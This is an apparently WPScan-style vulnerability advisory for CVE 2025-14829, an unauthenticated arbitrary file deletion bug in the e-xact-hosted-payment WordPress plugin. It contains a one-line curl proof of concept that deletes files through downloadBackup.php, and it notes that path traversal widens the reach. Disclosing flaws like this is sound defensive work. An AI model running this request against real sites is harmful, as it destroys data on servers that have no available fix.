e-xact-hosted-payment <= 2.0 – Unauthenticated Arbitrary File Deletion | CVE 2025-14829 | Plugin Vulnerabilities

Description

The plugin is vulnerable to arbitrary file deletion due to insufficient file path validation. This makes it possible for unauthenticated attackers to delete arbitrary files on the server.

Proof of Concept

```
curl -X POST http://example.com/wp-content/plugins/e-xact-hosted-payment/downloadBackup.php   -d "download_current_backup=readme.txt"
```

By default, the PoC removes the plugin's readme.txt but traversal can be used to remove other files.

Affects Plugins

e-xact-hosted-payment

No known fix

References

CVE

Classification

Type

NO AUTHORISATION

OWASP top 10

A5: Broken Access Control

CWE

CVSS

Miscellaneous

Original Researcher

Khaled Alenazi (Nxploited)

Submitter

Khaled Alenazi (Nxploited)

Verified

Yes

WPVDB ID

872569bc-16fb-427f-accc-147f284137cd

Timeline

Publicly Published

2025-12-23 (about 1 month ago)

Added

2025-12-23 (about 1 month ago)

Last Updated

2025-12-23 (about 1 month ago)

Other

Published

Title

Published

2024-05-20

Title

YouTube Video Gallery by YouTube Showcase – Video Gallery Plugin for WordPress < 3.4.0 - Missing Authorization to Arbitrary Post/Page Creation

Published

2024-11-08

Title

Th Shop Mania < 1.5.0 - Authenticated (Subscriber+) Arbitrary Plugin Installation/Activation

Published

2025-12-31

Title

Headinger for Elementor <= 1.1.4 - Missing Authorization

Published

2024-03-26

Title

Multiple Page Generator Plugin – MPG < 3.4.1 - Missing Authorization via mpg_get_log_by_project_id

Published

2026-01-08

Title

Contact Form vCard Generator <= 2.4 - Missing Authorization to Unauthenticated Sensitive Information Exposure via 'wp-gvc-cf-download-id' Parameter